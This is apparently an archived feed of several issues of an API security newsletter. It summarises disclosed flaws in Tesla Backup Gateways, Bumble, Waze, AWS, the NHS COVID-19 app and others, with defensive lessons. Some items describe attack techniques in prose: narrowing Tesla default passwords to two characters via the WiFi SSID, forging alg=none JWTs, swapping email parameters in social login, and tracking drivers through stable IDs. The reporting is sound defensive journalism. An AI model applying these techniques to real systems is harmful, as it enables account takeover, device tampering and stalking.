<p><a href="https://blog.rapid7.com/2020/11/17/dont-put-it-on-the-internet-tesla-backup-gateway-edition/" target="_blank" rel="noopener noreferrer">Derek Abdine has looked into API security in Tesla Backup Gateways</a>, which are part of the Powerwall and Powerpack systems. Gateways determine when to charge the batteries, when to send the power back to the power grid, and what combination of solar, battery, and grid energy to use to power the house.</p>
<p>The gateways are connected to the internet and expose API endpoints. These APIs are not officially published as part of Tesla&#8217;s documentation but have been discovered (unsurprisingly) and documented by the community.</p>
<p>Some of the APIs do not require authentication, and thus publicly expose data on the individual installation, such as energy consumption and production data, display name, country and state, name of the utility company, and so on. Even this seemingly innocent data can be used for nefarious purposes, such as timing burglary when the energy consumption is low, indicating an empty house.</p>
<p>The APIs that manage the system are quite sensitive because of the potential to damage the system itself and possibly even the grid to which these systems are connected. These APIs are secured, but the default credentials to these APIs are quite weak. The default password are the last five characters of the serial number. That serial number is printed on the device and so accessible to anyone in the neighborhood if it is installed outside. In fact, some counties publish households&#8217; installation permits for Tesla Solar and Powerwall to the internet, making physical location of the systems public.</p>
<p>Even worse, the gateways also expose WiFi access points that always follow the same SSID naming pattern: <code>TEG-XXX</code> , where <code>X</code>s are the last three characters of the serial number. These characters, also used in the default passwords, can be found in various WiFi SSID catalogs. This significantly reduces the scope of brute-force attacks to find out the default password from five to just two alphanumeric characters!</p>
<p>Read for full story for more details on the potential exposure. This can serve as another warning on the potential physical risks of API security in the world of IoT, and the dangers of non-random default passwords.</p>
<h2>Vulnerability: Twitter Fleets</h2>
<p>Twitter Fleets are the newly launched ephemeral media posts that are supposed to disappear after 24 hours.</p>
<p>However, <a href="https://twitter.com/donk_enby/status/1329935540049817600" target="_blank" rel="noopener noreferrer">a researcher found out that the APIs behind the feature allow access to older fleets</a>.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7500 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/11/twitter-fleets-api.jpg" alt="" width="1800" height="1100" /></p>
<p>Adding to the trouble, accessing fleets through API does not trigger read notifications — there is a separate API call to do that.</p>
<p>This is one of the typical examples of what happens when the user interface is viewed as the security boundary and the underlying API as mere implementation detail. APIs are very easy to discover these days, making it easy to circumvent the security on the UI.</p>
<p>Treat APIs as the security boundary and implement all your limits and security controls there!</p>
<h2>Conference: DeveloperWeek New York</h2>
<p>The silver lining of the pandemic is that it has forced all industry events to go virtual, making it possible to attend them without having to travel around the world, and <a href="https://www.developerweek.com/NYC/" target="_blank" rel="noopener noreferrer">DeveloperWeek New York</a> on December 9—10, 2020 is no exception.</p>
<p>There&#8217;s a lot of good content, and I will be presenting a session on how to secure REST APIs if they are implemented as microservices in Kubernetes. My session &#8220;API Security in a Kubernetes World&#8221; is at 1:30 pm EST on December 9th.</p>
<p>If you need a free pass, <a href="https://bit.ly/38wV0h6" target="_blank" rel="noopener noreferrer">you can get one from my speaker quota here</a>. <img src="https://s.w.org/images/core/emoji/16.0.1/72x72/1f609.png" alt="😉" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>The post <a href="https://apisecurity.io/issue-111-api-vulnerabilities-aws-tesla-backup-gateway-twitter/">Issue 111: API vulnerabilities in AWS, Tesla Backup Gateway, Twitter</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 110: API flaws in Bumble and COVID-KAYA, Forrester on API security, ASC 2020 talks</title>
		<link>https://apisecurity.io/issue-110-api-flaws-bumble-covid-kaya-forrester-api-security-asc-2020-talks/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 18 Nov 2020 22:00:52 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7465</guid>

					<description><![CDATA[<p>This week, we check out API vulnerabilities in the dating app Bumble and COVID-KAYA, an app for front-line healthcare workers in the Philippines. There&#8217;s also a new Forrester report and an upcoming webinar on API security, as well as a couple of recordings of API security talks from the recent API Specification Conference (ASC). Vulnerability: [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-110-api-flaws-bumble-covid-kaya-forrester-api-security-asc-2020-talks/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-110-api-flaws-bumble-covid-kaya-forrester-api-security-asc-2020-talks/">Issue 110: API flaws in Bumble and COVID-KAYA, Forrester on API security, ASC 2020 talks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out API vulnerabilities in the dating app Bumble and COVID-KAYA, an app for front-line healthcare workers in the Philippines. There&#8217;s also a new Forrester report and an upcoming webinar on API security, as well as a couple of recordings of API security talks from the recent API Specification Conference (ASC).</p>
<h2>Vulnerability: Bumble</h2>
<p>Sanjana Sarda from Independent Security Evaluators found <a href="https://blog.securityevaluators.com/reverse-engineering-bumbles-api-a2a0d39b3a87" target="_blank" rel="noopener noreferrer">multiple vulnerabilities in the APIs behind the Bumble dating app</a>. The app has about 95 million users, so the potential exposure is significant.</p>
<p>The found vulnerabilities included, for example:</p>
<ul>
<li>Bypassing the limits for premium features and on free accounts, because the limits were only enforced on the UI, not in APIs.</li>
<li>Retrieving arbitrary user profiles at arbitrary locations through the user search API.</li>
<li>Triangulating the exact location of other users based on the retrieved distance from the arbitrary location mentioned above.</li>
<li>Retrieving sensitive information on any user, including personal information, their Facebook interests and likes, and so on.</li>
<li>Retrieving a lot of information on a lot of or all users programmatically by using a script, because there was no API rate limiting.</li>
<li>Allowing locked accounts still access the APIs.</li>
</ul>
<p>Needless to say, all of these combined could lead to massive privacy and personal security implications. Bumble has fixed some of the issues at least, but not everything yet.</p>
<p>Lessons learned here:</p>
<ul>
<li><a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api4-lack-of-resources-and-rate-limiting.htm">API4:2019 — Lack of resources and rate limiting</a> and <a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure.htm">API3:2019 — Excessive data exposure</a> are both dangerous and should be watched out for!</li>
<li>Any time location info is involved, you should take measures to prevent it from leaking: block triangulation, randomize location.</li>
<li>Make sure that security measures (features, access, account disabling) are enforced on the API level rather than the UI level.</li>
</ul>
<p>Unfortunately, this is not the first (and most likely not the last) time that API vulnerabilities have been uncovered in dating apps. We have previously had API vulnerabilities from other dating apps in issues <a href="https://apisecurity.io/issue-18-security-audits-for-your-api-contracts-google-limits-gmail-api-access/">18,</a> <a href="https://apisecurity.io/issue-44-acs-2019-agenda/">44</a>. <a href="https://apisecurity.io/issue-45-hacked-dating-apps-smartlocks-cloud-egregious-11/" target="_blank" rel="noopener noreferrer">45</a>, <a href="https://apisecurity.io/issue-64-api-vulnerabilities-plenty-fish-sonyliv-sharepoint-facebook/" target="_blank" rel="noopener noreferrer">64</a>, <a href="https://apisecurity.io/issue-95-vulnerabilities-zoom-okcupid-progress-oauth-2-1-api-information-disclosure/" target="_blank" rel="noopener noreferrer">95</a>, and <a href="https://apisecurity.io/issue-106-api-flaws-gitlab-grindr-apicheck-api-world-apidays-next-week/" target="_blank" rel="noopener noreferrer">106</a>.</p>
<h2>Vulnerability: COVID-KAYA</h2>
<p>COVID-KAYA is an app created by the Philippines Department of Health and WHO. Front-line healthcare workers in the Philippines use the app to report COVID-19 cases.</p>
<p>Unfortunately, <a href="https://citizenlab.ca/2020/11/unmasked-covid-kaya-and-the-exposure-of-healthcare-worker-data-in-the-philippines/" target="_blank" rel="noopener noreferrer">Citizen Lab from Canada found that the app had API flaws that exposed the private data of the personnel using the app</a>, and potentially the patients&#8217; too:</p>
<ul>
<li>API authentication was flawed and a failed login attempt actually granted API access. Presumably this was for password reset, but attackers could use it to figure out and and take advantage of other API endpoints.</li>
<li>The API allowed retrieving information about the medical personnel using the COVID-KAYA and which facilities they worked in.</li>
<li>The Android app had hard-coded API credentials that turned out to be simply predefined base64-encoded username and password with superuser (administrative) rights.</li>
</ul>
<p>The discovered vulnerabilities have since been fixed. Lessons learned from this one:</p>
<ul>
<li>Authentication is key and needs to be carefully implemented (see <a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication.htm">API2:2019 — Broken authentication</a>)!</li>
<li>Don&#8217;t implement authentication bypass for some functions with the hope that attackers <em>won&#8217;t</em> find the rest of API endpoints. They will.</li>
<li>Never, ever hard-code credentials!</li>
</ul>
<p>Unfortunately, with governments struggling with a fast response to the pandemic, this is not the first time that COVID-related applications have been rushed out with poor API security. See our previous coverage, for example, in issues <a href="https://apisecurity.io/issue-83-indias-covid-19-tracing-app-oauth2-api-attacks/" target="_blank" rel="noopener noreferrer">83</a>, <a href="https://apisecurity.io/issue-98-apis-next-frontier-cybercrime/" target="_blank" rel="noopener noreferrer">98</a>, and <a href="https://apisecurity.io/issue-107-vulnerabilities-waze-aws-nhs-covid-19-app-forrester-app-sec-tech-tide/" target="_blank" rel="noopener noreferrer">107</a>.</p>
<h2>Analyst report: Forrester</h2>
<p>Sandra Carielli from Forrester has published a detailed report on the state of API security called &#8220;API Insecurity: The Lurking Threat In Your Software&#8221;.</p>
<p>In the report, she explains API security risks, as well as tools and approaches to address them. Check out her blog post for the <a href="https://go.forrester.com/blogs/the-power-and-the-peril-of-apis/" target="_blank" rel="noopener noreferrer">report overview</a>, or get the <a href="https://www.forrester.com/report/API+Insecurity+The+Lurking+Threat+In+Your+Software/-/E-RES142080?objectid=RES142080" target="_blank" rel="noopener noreferrer">full report</a>.</p>
<p>There will also be a webinar on the subject on December 1. For more details and to enroll, click <a href="https://www.forrester.com/webinar/More+Than+A+Gateway+Take+A+Holistic+Approach+To+API+Security/-/E-WEB32425" target="_blank" rel="noopener noreferrer">here</a>.</p>
<p>(Disclosure: my employer, 42Crunch has contributed to the report and is one of the vendors featured in it.)</p>
<h2>Conference talks: API security at ASC 2020</h2>
<p>ASC is a great annual event organized by the OpenAPI Initiative (OAI) — the Linux Foundation body behind the OpenAPI Specification (OAS).</p>
<p>ASC 2020 has just <a href="https://www.openapis.org/blog/2020/11/04/asc-2020-online-dont-asc-still-learn" target="_blank" rel="noopener noreferrer">published the slides and session recordings</a> from this year&#8217;s event, and there are two API security talks worth checking out:</p>
<ul>
<li>&#8220;Not your Uncle&#8217;s Auth: OAuth2.1 and Other Updates in Securing Your API&#8221; by Vittorio Bertocci:</li>
</ul>
<p><iframe loading="lazy" title="Not your Uncle&#039;s Auth: OAuth2.1 and Other Updates in Securing Your API" width="640" height="360" src="https://www.youtube.com/embed/tEUIsc6skJQ?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<ul>
<li>&#8220;Did You Know You Could Use OpenAPI for Security?&#8221; by Isabelle Mauny:</li>
</ul>
<p><iframe loading="lazy" title="Did You Know You Could Use OpenAPI for Security?" width="640" height="360" src="https://www.youtube.com/embed/lfV2BeFrqpE?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>The post <a href="https://apisecurity.io/issue-110-api-flaws-bumble-covid-kaya-forrester-api-security-asc-2020-talks/">Issue 110: API flaws in Bumble and COVID-KAYA, Forrester on API security, ASC 2020 talks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 109: API token best practices, Dredd, IDOR hunting tips</title>
		<link>https://apisecurity.io/issue-109-api-token-best-practices-dredd-idor-hunting-tips/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 11 Nov 2020 22:00:21 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7447</guid>

					<description><![CDATA[<p>This week, another API has been leaking voter data in the US, we take a look at Dynatrace&#8217;s API token best practices as well as Dredd, an open-source OpenAPI verification tool, and there is a video with tips on locating broken object-level authorization vulnerabilities in APIs. Vulnerability: Trump campaign&#8217;s post-election site Although the campaigns are [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-109-api-token-best-practices-dredd-idor-hunting-tips/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-109-api-token-best-practices-dredd-idor-hunting-tips/">Issue 109: API token best practices, Dredd, IDOR hunting tips</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, another API has been leaking voter data in the US, we take a look at Dynatrace&#8217;s API token best practices as well as Dredd, an open-source OpenAPI verification tool, and there is a video with tips on locating broken object-level authorization vulnerabilities in APIs.</p>
<h2>Vulnerability: Trump campaign&#8217;s post-election site</h2>
<p>Although the campaigns are finally over, the US elections still feature in our newsletter. This time the dubious star of the week is the website that Trump campaign launched to collect anecdotal evidence of voting issues. Unsurprisingly, researchers found that the APIs behind the site <a href="https://www.bleepingcomputer.com/news/security/trump-lawsuit-site-to-report-rejected-votes-leaked-voter-data/" target="_blank" rel="noopener noreferrer">where poorly protected and leaking voter information</a>.</p>
<p>The first issue was in an API behind the site allowed bulk retrieval of voter registration data. Secondly, the API key and application ID required for the API calls could be easily found and reused. This way, attackers could programmatically crawl through the data set and scrape the personal details to build a nice asset for further attacks.</p>
<p>The API in question has since been removed from the page.</p>
<p>In addition to this, there have been allegations on SQL injections that would allow retrieving a lot more data from the underlying database, as well as allegations of the site leaking the last 4 digits of social security number (SSN) and dates of birth on top of voter names and addresses.</p>
<p>We covered in our <a href="https://apisecurity.io/issue-102-vulnerabilities-facebook-campaign-apps-creating-defensible-apis/" target="_blank" rel="noopener noreferrer">issue 102</a> how both campaigns&#8217; mobile apps also had API vulnerabilities.</p>
<h2>Best practices: API tokens</h2>
<p>API tokens (API keys) can be pretty much anything, so it is always good when companies are sharing their design decisions and rationale behind them. <a href="https://www.dynatrace.com/news/blog/further-enhance-security-by-easily-automating-your-api-token-protection/" target="_blank" rel="noopener noreferrer">Barbara Schachner from Dynatrace has written a blog post</a> on the new API token format that they have adopted.</p>
<p>All API tokens there now consist of 3 sections, separated by dots:</p>
<ol>
<li>The <code>dt0c01</code> prefix, to clearly separate Dynatrace tokens from others.</li>
<li>A 24-character public alphanumeric string that is both unique as well as safe to display on the UI and write to logs for troubleshooting and account identification.</li>
<li>A 64-character <em>secret</em> alphanumeric string that acts as the password, never to be shared or made visible anywhere.</li>
</ol>
<p>Dynatrace have also shared a regular expression for the token detection and are working with GitHub to get the GitHub secret scanning service to automatically detect their tokens in the committed source code.</p>
<h2>Tools: Dredd</h2>
<p>If left unchecked, API responses may leak data (see OWASP <a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure.htm">API3:2019 — Excessive data exposure</a>) and lead to further attacks and breaches. Thus, it is important to ensure that your APIs only return the data they are supposed to return, and that new versions of the API don&#8217;t accidentally change that.</p>
<p><a href="https://dredd.org/" target="_blank" rel="noopener noreferrer">Dredd is an open-source tool that can help with that</a>. It is a response verifier that takes examples from the OpenAPI definition of the API, invokes the API, and then compares the received responses to what is declared in the OpenAPI specification.</p>
<p>A handy way to keep on top of your API responses, and you can integrate it to your test suite.</p>
<p>(Dredd is kind of an open-source alternative to a subset of the <a href="https://42crunch.com/api-conformance-scan/" target="_blank" rel="noopener noreferrer">42Crunch Conformance Scan</a>. The difference is that Dredd only looks at API responses while 42Crunch also ensures that the calls outside the contract &#8211; different paths, verbs, parameters, payloads, patterns, etc. &#8211; also get rejected.)</p>
<h2>Video: IDOR Hunting Tips</h2>
<p>Katie Paxton-Fear has posted a new getting started video in which she covers the basics of <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization.htm" target="_blank" rel="noopener noreferrer">Broken object level authorization (BOLA/IDOR)</a>, with a little bit of broken authentication, broken function level authorization, undocumented CRUD, tools, and tricks on the side. As always, worth checking out.</p>
<p><iframe loading="lazy" title="How I made 1k in a day with IDORs! (10 Tips!)" width="640" height="360" src="https://www.youtube.com/embed/hmlkUYJ9MFw?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-109-api-token-best-practices-dredd-idor-hunting-tips/">Issue 109: API token best practices, Dredd, IDOR hunting tips</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 108: API vulnerabilities in Thrillophilia and GitLab</title>
		<link>https://apisecurity.io/issue-108-api-vulnerabilities-thrillophilia-gitlab/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 04 Nov 2020 22:00:05 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7434</guid>

					<description><![CDATA[<p>This week, we have the recent API vulnerabilities in Thrillophilia and GitLab, there is a new free online course on OpenID Connect, and OpenAPI support has been recently added in Cloudflare. Vulnerability: Thrillophilia Thrillophilia is an Indian online platform for discovering and booking travel experiences and tours. Ehraz Ahmed found that Thrillophilia exposed about 2 [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-108-api-vulnerabilities-thrillophilia-gitlab/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-108-api-vulnerabilities-thrillophilia-gitlab/">Issue 108: API vulnerabilities in Thrillophilia and GitLab</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have the recent API vulnerabilities in Thrillophilia and GitLab, there is a new free online course on OpenID Connect, and OpenAPI support has been recently added in Cloudflare.</p>
<h2>Vulnerability: Thrillophilia</h2>
<p>Thrillophilia is an Indian online platform for discovering and booking travel experiences and tours. Ehraz Ahmed found that <a href="https://www.cnbctv18.com/travel/security-lapse-puts-data-of-thrillophilias-registered-users-at-risk-7252261.htm" target="_blank" rel="noopener noreferrer">Thrillophilia exposed about 2 million customer records</a>.</p>
<p>As many consumer sites, the Bengaluru-based company offered the social login option of using 3rd-party accounts, in this case Facebook, to log in to their site. However, their API implementation for this was flawed and the API blindly trusted the email parameter that it received.</p>
<p>This meant that attackers could authenticate with their own account, but then change the email parameter from theirs to that of their victim. Thrillophilia APIs did not verify that the email parameter matched the rest of the authentication information. It simply accepted the integrity of the information and that this was an authenticated user, and gave access to the user records based on the email parameter (that the attackers had switched).</p>
<p>Thrillophilia has since fixed the issue.</p>
<p>Bottom-line: be careful with social login or <em>any</em> federated authentication. These can give you the false sense of security unless you carefully verify that no tampering with the tokens and any parameters is possible.</p>
<p>Ahmed has a record of uncovering vulnerabilities related to social login. We have previously covered him in our issues <a href="https://apisecurity.io/issue-53-vulnerabilities-in-twitterkit-justdial-voi-e-scooters/" target="_blank" rel="noopener noreferrer">53</a>, <a href="https://apisecurity.io/issue-59-vulnerabilities-in-fortinet-truecaller-nykaa-sma-m2-smartwatch/" target="_blank" rel="noopener noreferrer">59</a>, <a href="https://apisecurity.io/issue-61-exposed-patient-records-vulnerabilities-at-airtel-and-kaspersky/" target="_blank" rel="noopener noreferrer">61</a>, and <a href="https://apisecurity.io/issue-64-api-vulnerabilities-plenty-fish-sonyliv-sharepoint-facebook/" target="_blank" rel="noopener noreferrer">64</a>.</p>
<h2>Vulnerability: GitLab</h2>
<p><a href="https://about.gitlab.com/releases/2020/11/02/security-release-gitlab-13-5-2-released/" target="_blank" rel="noopener noreferrer">GitLab has just pushed out a set of security updates</a>, namely 13.5.2, 13.4.5, and 13.3.9.</p>
<p>These do not include fixes to any API security flaws in GitLab&#8217;s own code, but a couple of fixed vulnerabilities did stem from the 3rd-party components they use:</p>
<ul>
<li><strong>Kubernetes agent API leaked private repositories:</strong><br />
A vulnerability in the internal Kubernetes agent API allowed unauthorised access to private projects.</li>
<li><strong>Terraform state deletion API exposed object storage URL:</strong><br />
The Terraform API exposed the signed URL of object storage on the <code>DELETE</code> operation, allowing a malicious project maintainer to overwrite the Terraform state, bypassing audit and other business controls.</li>
</ul>
<p>This is just another reminder on the big impact that 3rd-party components and services can have for your overall security. Make sure to study their levels of security carefully and implement whatever additional protection you can: perform additional data validation on their calls, limit visibility and access to your code only, and so on.</p>
<h2>Training: OpenID Connect</h2>
<p>OpenID Connect (OIDC) is a popular authentication protocol based on OAuth2.</p>
<p>There&#8217;s <a href="https://curity.io/resources/webinars/course-openid-connect-in-detail/" target="_blank" rel="noopener noreferrer">a new free (registration required) 4-part online OpenID Connect (OIDC) training course</a> from Michał Trojanowski (Curity). The course includes:</p>
<ol>
<li>Overview of OIDC</li>
<li>ID Tokens and UserInfo EndPoint</li>
<li>Authentication with OIDC</li>
<li>OIDC Logout and session handling</li>
</ol>
<h2>Tools: Cloudflare API Shield</h2>
<p>More internet security products are starting to adopt positive security model for APIs  that is based on the OpenAPI Specification (OAS). Recently, <a href="https://blog.cloudflare.com/introducing-api-shield/" target="_blank" rel="noopener noreferrer">Cloudflare has announced the launch of their API Shield service</a>.</p>
<p>For existing Cloudflare customers who have centrally managed public APIs with well-defined OpenAPI definitions, this can be a quick way to improve runtime security.</p>
<p>At the moment, API Shield offers mutual certificate authentication (mTLS) enforcement and JSON schema validator (in beta). The roadmap includes rate limiting, DDoS protection, web application rules designed for APIs, and analytics.</p>
<p>The post <a href="https://apisecurity.io/issue-108-api-vulnerabilities-thrillophilia-gitlab/">Issue 108: API vulnerabilities in Thrillophilia and GitLab</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 107: Vulnerabilities in Waze, AWS, and NHS COVID-19 app, Forrester App Sec Tech Tide</title>
		<link>https://apisecurity.io/issue-107-vulnerabilities-waze-aws-nhs-covid-19-app-forrester-app-sec-tech-tide/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 28 Oct 2020 22:00:39 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7416</guid>

					<description><![CDATA[<p>This week, we check out three API vulnerability reports for Waze, Amazon Web Services (AWS), and the UK NHS COVID-19 app. In addition, the new Forrester study of the technologies constituting application security as of Q4 2020 has been published. Vulnerability: Waze Remember the fun &#8220;other cars&#8221; icons that Waze, Google&#8217;s social GPS navigation app [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-107-vulnerabilities-waze-aws-nhs-covid-19-app-forrester-app-sec-tech-tide/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-107-vulnerabilities-waze-aws-nhs-covid-19-app-forrester-app-sec-tech-tide/">Issue 107: Vulnerabilities in Waze, AWS, and NHS COVID-19 app, Forrester App Sec Tech Tide</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out three API vulnerability reports for Waze, Amazon Web Services (AWS), and the UK NHS COVID-19 app. In addition, the new Forrester study of the technologies constituting application security as of Q4 2020 has been published.</p>
<h2>Vulnerability: Waze</h2>
<p>Remember the fun &#8220;other cars&#8221; icons that Waze, Google&#8217;s social GPS navigation app providing travel times and route details by other users, is showing on the maps? Peter Gasper decided to have a look on the API behind them and <a href="https://www.malgregator.com/post/waze-how-i-tracked-your-mother/" target="_blank" rel="noopener noreferrer">found exposure of some sensitive data lurking there</a>.</p>
<p>To look at the API, Gasper used Waze&#8217;s web page <code>waze.com/livemap</code> that also shows the car icons, just like the mobile app. The API behind takes the latitude and longitude coordinates as parameters and returns JSON with the car objects to draw nearby. Besides the coordinates, these JSON objects included identification numbers (IDs) that did not change over time.</p>
<p>This means that each number uniquely identified a particular Waze driver. So if there is a particular car passing you, the driver is a Waze user, and you want to track where it is going, you can start invoking the API sending GPS coordinates in its proximity and each time getting its new location.</p>
<p>Gasper created a proof-of-concept exploit by building a Chromium extension leveraging <code>chrome.devtools</code> component to capture JSON responses from the API behind the page, and tracking a car:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7417 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/10/waze_tracking.jpg" alt="" width="1080" height="575" /></p>
<p>This is bad enough by itself: enabling virtual spying after strangers, discovering their routes over days, and potentially de-anonymizing Waze users that way.</p>
<p>It turned out that another Waze API leaked even more. Any time a user reported — or even just confirmed — an obstacle on the road, that API would include both that internal user ID and the Waze username of that user in the API response. With many people using their actual names as usernames, or reusing usernames across various profiles on the internet, that provided a way to go one step further and discover the real, offline identity of many drivers.</p>
<p>And just like with the first API, you do not need to be physically present to use the API. You could just invoke it with the coordinates of high traffic areas and harvest the ID to username mappings.</p>
<p>So, a pretty bad case of <a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure.htm" target="_blank" rel="noopener noreferrer">API3:2019 — Excessive data exposure</a> vulnerability leading to personal privacy risks. To avoid such vulnerabilities in your APIs:</p>
<ul>
<li>Document, review, and enforce any and all API responses.</li>
<li>Make sure not to return anything that your app does not actually need. Approximate GPS coordinates without IDs would have been more than enough to draw the icons in Waze.</li>
<li>Do not leak internal identifiers.</li>
<li>Whenever your API returns any data, ask yourself whether you yourself would be comfortable if someone gets their hands on that data. If not, think again.</li>
<li>Do what you can to make it harder for attackers to bulk use your API for data harvesting.</li>
</ul>
<h2>Vulnerability: AWS</h2>
<p><a href="https://frichetten.com/blog/aws-api-enum-vuln/" target="_blank" rel="noopener noreferrer">Nick Frichette found that for a given AWS user or role, he could use the AWS API to enumerate permissions </a> without having these calls logged to CloudTrail. The vulnerability affected 645 different API actions across 40 different AWS services.</p>
<p>The APIs that were vulnerable returned:</p>
<ul>
<li>A <code>403</code> response if the account <em>did not</em> <em>have</em> permission to call the API</li>
<li>A <code>404</code> response if the account <em>had</em> permissions to call the API</li>
</ul>
<p>Since the call was &#8220;malformed&#8221; &#8211; it did not actually retrieve the resource &#8211; the system didn&#8217;t consider it important enough to log the calls in CloudTrail. Thus, attackers who got a hold of an AWS account in the target system could run a script and quickly (and without being noticed!) find what else they can do with that account.</p>
<p>This is an example of <a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api10-insufficient-logging-and-monitoring.htm" target="_blank" rel="noopener noreferrer">OWASP API10:2019 — Insufficient logging and monitoring</a> vulnerability. Make sure to log sensitive calls and failures, monitor the logs to detect attacks, and take action.</p>
<h2>Vulnerability: UK NHS Android COVID-19 tracing app</h2>
<p>James &#8216;zofrex&#8217; Sanderson checked out  the UK NHS Android COVID-19 tracing app and found a minor vulnerability in it.</p>
<p>Among other things, the app has the functionality to check into a venue by scanning its QR code. These QR codes are JSON Web Tokens (JWTs), issued and signed by the NHS to prevent fraud.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7418 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/10/NHS_QR.jpg" alt="" width="800" height="420" /></p>
<p>As James explains, the JWT standard can be tricky and error-prone to implement. It is extremely flexible and includes many features that can leave you unprotected. One such feature is the ability to specify the signing algorithm and the keys in the JWT itself.</p>
<p>Proper JWT implementations need to watch out for someone leading you to trust the algorithms and keys that are not yours. However, the creators of this app used the <code>jjwt</code> library for their JWT implementation, and this library did not make it obvious how to protect against such attacks. As result, someone could create a forged JWT token (and the QR code representing it) without any signature at all and specify <code>alg=none</code> as the algorithm to be used.</p>
<p>See James&#8217; <a href="https://www.zofrex.com/blog/2020/10/20/alg-none-jwt-nhs-contact-tracing-app/" target="_blank" rel="noopener noreferrer">writeup</a> for more details. Thankfully, there were no implications on things like privacy or personal data here, but nothing prevents a similar issue from cropping up in a more sensitive place, so worth taking lessons here.</p>
<p>For more information on JWT attacks and security, see the collection of conference talks that we had in our <a href="https://apisecurity.io/issue-72-vulnerabilities-in-wordpress-themerex-addons-and-voatz-facebook-postmortem-jwt-talks-openapi-specification-3-0-3/" target="_blank" rel="noopener noreferrer">issue 72</a> .</p>
<h2>Analysts: Forrester Tech Tide for Application Security</h2>
<p>Application security is a broad area, with multiple technologies that companies employ to cover all their bases.</p>
<p>These technologies are all in different stages of maturity, producing different return of investment. And with application security specialists more stretched than they have ever been, companies need guidance to prioritize their projects.</p>
<p>This is where the report <a href="https://www.forrester.com/report/The+Forrester+Tech+Tide+Application+Security+Q4+2020/-/E-RES154237" target="_blank" rel="noopener noreferrer">Tech Tide report for Application Security Q4, 2020</a> by Sandy Carielli from Forrester comes in handy. Carielli ranks 20 major app sec technologies by business value and maturity, lists major vendors, and provides investment guidelines.</p>
<p>Quoting from the report abstract:</p>
<blockquote><p><em>Application security is increasingly critical to firms&#8217; ability to win, serve, and retain their customers. To accelerate their performance in application security, companies are evaluating and adopting a range of contributing technologies. This Forrester Tech Tide<img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" /> report presents an analysis of the maturity and business value of the 20 technology categories that support application security. Security pros should read this report to shape their firm&#8217;s investment approach to these technologies.</em></p></blockquote>
<p>And most importantly for this newsletter, <strong>API security gets a strong recommendation to invest</strong>!</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
